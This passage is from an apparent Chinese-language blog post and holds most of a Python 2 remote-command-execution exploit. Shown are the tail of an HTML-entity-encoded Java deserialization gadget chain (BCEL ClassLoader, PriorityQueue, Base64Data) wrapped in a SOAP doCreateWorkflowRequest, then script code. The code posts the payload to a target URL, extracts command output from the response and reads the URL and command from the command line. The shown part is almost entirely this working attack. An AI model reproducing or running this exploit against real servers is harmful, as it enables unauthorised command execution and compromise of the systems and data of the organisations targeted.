&#46;&#67;&#108;&#97;&#115;&#115;&#76;&#111;&#97;&#100;&#101;&#114;&#39;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#100;&#101;&#102;&#97;&#117;&#108;&#116;&#68;&#111;&#109;&#97;&#105;&#110;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#108;&#97;&#115;&#115;&#108;&#111;&#97;&#100;&#101;&#114;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#111;&#114;&#103;&#46;&#97;&#112;&#97;&#99;&#104;&#101;&#46;&#98;&#99;&#101;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#117;&#116;&#105;&#108;&#46;&#67;&#108;&#97;&#115;&#115;&#76;&#111;&#97;&#100;&#101;&#114;&#39;&#32;&#114;&#101;&#102;&#101;&#114;&#101;&#110;&#99;&#101;&#61;&#39;&#46;&#46;&#47;&#46;&#46;&#39;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#112;&#114;&#105;&#110;&#99;&#105;&#112;&#97;&#108;&#115;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#104;&#97;&#115;&#65;&#108;&#108;&#80;&#101;&#114;&#109;&#62;&#102;&#97;&#108;&#115;&#101;&#60;&#47;&#104;&#97;&#115;&#65;&#108;&#108;&#80;&#101;&#114;&#109;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#115;&#116;&#97;&#116;&#105;&#99;&#80;&#101;&#114;&#109;&#105;&#115;&#115;&#105;&#111;&#110;&#115;&#62;&#102;&#97;&#108;&#115;&#101;&#60;&#47;&#115;&#116;&#97;&#116;&#105;&#99;&#80;&#101;&#114;&#109;&#105;&#115;&#115;&#105;&#111;&#110;&#115;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#107;&#101;&#121;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#107;&#101;&#121;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#100;&#101;&#102;&#97;&#117;&#108;&#116;&#68;&#111;&#109;&#97;&#105;&#110;&#62;&#10;&#60;&#100;&#111;&#109;&#97;&#105;&#110;&#115;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#34;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#67;&#111;&#108;&#108;&#101;&#99;&#116;&#105;&#111;&#110;&#115;&#36;&#83;&#121;&#110;&#99;&#104;&#114;&#111;&#110;&#105;&#122;&#101;&#100;&#83;&#101;&#116;&#34;&#32;&#115;&#101;&#114;&#105;&#97;&#108;&#105;&#122;&#97;&#116;&#105;&#111;&#110;&#61;&#34;&#99;&#117;&#115;&#116;&#111;&#109;&#34;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#67;&#111;&#108;&#108;&#101;&#99;&#116;&#105;&#111;&#110;&#115;&#95;&#45;&#83;&#121;&#110;&#99;&#104;&#114;&#111;&#110;&#105;&#122;&#101;&#100;&#67;&#111;&#108;&#108;&#101;&#99;&#116;&#105;&#111;&#110;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#100;&#101;&#102;&#97;&#117;&#108;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#34;&#115;&#101;&#116;&#34;&#62;&#60;&#47;&#99;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#109;&#117;&#116;&#101;&#120;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#34;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#67;&#111;&#108;&#108;&#101;&#99;&#116;&#105;&#111;&#110;&#115;&#36;&#83;&#121;&#110;&#99;&#104;&#114;&#111;&#110;&#105;&#122;&#101;&#100;&#83;&#101;&#116;&#34;&#32;&#114;&#101;&#102;&#101;&#114;&#101;&#110;&#99;&#101;&#61;&#34;&#46;&#46;&#47;&#46;&#46;&#47;&#46;&#46;&#34;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#100;&#101;&#102;&#97;&#117;&#108;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#67;&#111;&#108;&#108;&#101;&#99;&#116;&#105;&#111;&#110;&#115;&#95;&#45;&#83;&#121;&#110;&#99;&#104;&#114;&#111;&#110;&#105;&#122;&#101;&#100;&#67;&#111;&#108;&#108;&#101;&#99;&#116;&#105;&#111;&#110;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#100;&#111;&#109;&#97;&#105;&#110;&#115;&#62;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#112;&#97;&#99;&#107;&#97;&#103;&#101;&#115;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#110;&#97;&#116;&#105;&#118;&#101;&#76;&#105;&#98;&#114;&#97;&#114;&#105;&#101;&#115;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#97;&#115;&#115;&#101;&#114;&#116;&#105;&#111;&#110;&#76;&#111;&#99;&#107;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#111;&#114;&#103;&#46;&#97;&#112;&#97;&#99;&#104;&#101;&#46;&#98;&#99;&#101;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#117;&#116;&#105;&#108;&#46;&#67;&#108;&#97;&#115;&#115;&#76;&#111;&#97;&#100;&#101;&#114;&#39;&#32;&#114;&#101;&#102;&#101;&#114;&#101;&#110;&#99;&#101;&#61;&#39;&#46;&#46;&#39;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#100;&#101;&#102;&#97;&#117;&#108;&#116;&#65;&#115;&#115;&#101;&#114;&#116;&#105;&#111;&#110;&#83;&#116;&#97;&#116;&#117;&#115;&#62;&#102;&#97;&#108;&#115;&#101;&#60;&#47;&#100;&#101;&#102;&#97;&#117;&#108;&#116;&#65;&#115;&#115;&#101;&#114;&#116;&#105;&#111;&#110;&#83;&#116;&#97;&#116;&#117;&#115;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#108;&#97;&#115;&#115;&#101;&#115;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#105;&#103;&#110;&#111;&#114;&#101;&#100;&#95;&#95;&#112;&#97;&#99;&#107;&#97;&#103;&#101;&#115;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#106;&#97;&#118;&#97;&#46;&#60;&#47;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#106;&#97;&#118;&#97;&#120;&#46;&#60;&#47;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#115;&#117;&#110;&#46;&#60;&#47;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#105;&#103;&#110;&#111;&#114;&#101;&#100;&#95;&#95;&#112;&#97;&#99;&#107;&#97;&#103;&#101;&#115;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#114;&#101;&#112;&#111;&#115;&#105;&#116;&#111;&#114;&#121;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#111;&#114;&#103;&#46;&#97;&#112;&#97;&#99;&#104;&#101;&#46;&#98;&#99;&#101;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#117;&#116;&#105;&#108;&#46;&#83;&#121;&#110;&#116;&#104;&#101;&#116;&#105;&#99;&#82;&#101;&#112;&#111;&#115;&#105;&#116;&#111;&#114;&#121;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#95;&#95;&#112;&#97;&#116;&#104;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#112;&#97;&#116;&#104;&#115;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#108;&#97;&#115;&#115;&#95;&#95;&#112;&#97;&#116;&#104;&#62;&#46;&#60;&#47;&#99;&#108;&#97;&#115;&#115;&#95;&#95;&#112;&#97;&#116;&#104;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#95;&#95;&#112;&#97;&#116;&#104;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#95;&#95;&#108;&#111;&#97;&#100;&#101;&#100;&#67;&#108;&#97;&#115;&#115;&#101;&#115;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#114;&#101;&#112;&#111;&#115;&#105;&#116;&#111;&#114;&#121;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#100;&#101;&#102;&#101;&#114;&#84;&#111;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#115;&#117;&#110;&#46;&#109;&#105;&#115;&#99;&#46;&#76;&#97;&#117;&#110;&#99;&#104;&#101;&#114;&#36;&#69;&#120;&#116;&#67;&#108;&#97;&#115;&#115;&#76;&#111;&#97;&#100;&#101;&#114;&#39;&#32;&#114;&#101;&#102;&#101;&#114;&#101;&#110;&#99;&#101;&#61;&#39;&#46;&#46;&#47;&#112;&#97;&#114;&#101;&#110;&#116;&#39;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#112;&#114;&#111;&#99;&#101;&#115;&#115;&#111;&#114;&#67;&#76;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#105;&#116;&#101;&#114;&#97;&#116;&#111;&#114;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#116;&#121;&#112;&#101;&#62;&#75;&#69;&#89;&#83;&#60;&#47;&#116;&#121;&#112;&#101;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#101;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#105;&#110;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#106;&#97;&#118;&#97;&#46;&#105;&#111;&#46;&#66;&#121;&#116;&#101;&#65;&#114;&#114;&#97;&#121;&#73;&#110;&#112;&#117;&#116;&#83;&#116;&#114;&#101;&#97;&#109;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#98;&#117;&#102;&#62;&#60;&#47;&#98;&#117;&#102;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#112;&#111;&#115;&#62;&#48;&#60;&#47;&#112;&#111;&#115;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#109;&#97;&#114;&#107;&#62;&#48;&#60;&#47;&#109;&#97;&#114;&#107;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#111;&#117;&#110;&#116;&#62;&#48;&#60;&#47;&#99;&#111;&#117;&#110;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#105;&#110;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#105;&#115;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#111;&#110;&#115;&#117;&#109;&#101;&#100;&#62;&#102;&#97;&#108;&#115;&#101;&#60;&#47;&#99;&#111;&#110;&#115;&#117;&#109;&#101;&#100;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#100;&#97;&#116;&#97;&#83;&#111;&#117;&#114;&#99;&#101;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#116;&#114;&#97;&#110;&#115;&#102;&#101;&#114;&#70;&#108;&#97;&#118;&#111;&#114;&#115;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#100;&#97;&#116;&#97;&#72;&#97;&#110;&#100;&#108;&#101;&#114;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#100;&#97;&#116;&#97;&#76;&#101;&#110;&#62;&#48;&#60;&#47;&#100;&#97;&#116;&#97;&#76;&#101;&#110;&#62;&#10;&#32;&#32;&#32;&#32;&#60;&#47;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#120;&#109;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#98;&#105;&#110;&#100;&#46;&#118;&#50;&#46;&#114;&#117;&#110;&#116;&#105;&#109;&#101;&#46;&#117;&#110;&#109;&#97;&#114;&#115;&#104;&#97;&#108;&#108;&#101;&#114;&#46;&#66;&#97;&#115;&#101;&#54;&#52;&#68;&#97;&#116;&#97;&#62;&#10;&#32;&#32;&#32;&#32;&#60;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#120;&#109;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#98;&#105;&#110;&#100;&#46;&#118;&#50;&#46;&#114;&#117;&#110;&#116;&#105;&#109;&#101;&#46;&#117;&#110;&#109;&#97;&#114;&#115;&#104;&#97;&#108;&#108;&#101;&#114;&#46;&#66;&#97;&#115;&#101;&#54;&#52;&#68;&#97;&#116;&#97;&#32;&#114;&#101;&#102;&#101;&#114;&#101;&#110;&#99;&#101;&#61;&#39;&#46;&#46;&#47;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#120;&#109;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#98;&#105;&#110;&#100;&#46;&#118;&#50;&#46;&#114;&#117;&#110;&#116;&#105;&#109;&#101;&#46;&#117;&#110;&#109;&#97;&#114;&#115;&#104;&#97;&#108;&#108;&#101;&#114;&#46;&#66;&#97;&#115;&#101;&#54;&#52;&#68;&#97;&#116;&#97;&#39;&#47;&#62;&#10;&#32;&#32;&#60;&#47;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#80;&#114;&#105;&#111;&#114;&#105;&#116;&#121;&#81;&#117;&#101;&#117;&#101;&#62;&#10;&#60;&#47;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#80;&#114;&#105;&#111;&#114;&#105;&#116;&#121;&#81;&#117;&#101;&#117;&#101;&#62;</web:string>
        <web:string>2</web:string>
      </web:doCreateWorkflowRequest>
   </soapenv:Body>
</soapenv:Envelope>'''
    resp = requests.post(expurl, headers=headers, cookies=cookies, data=data)
    if '&error=' in resp.content and 'Auth=' in resp.content:
        result = resp.content.split('&error=')[0]
        result = result.replace('Auth=','')
        print decode(result)


if __name__ == '__main__':
    import sys
    if len(sys.argv)<3:
        print 'python '+sys.argv[0]+' url cmd'
    else:
        url = sys.argv[1]
        cmd = sys.argv[2]
        exploit(url,cmd)

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

您的电子邮箱地址不会被公开。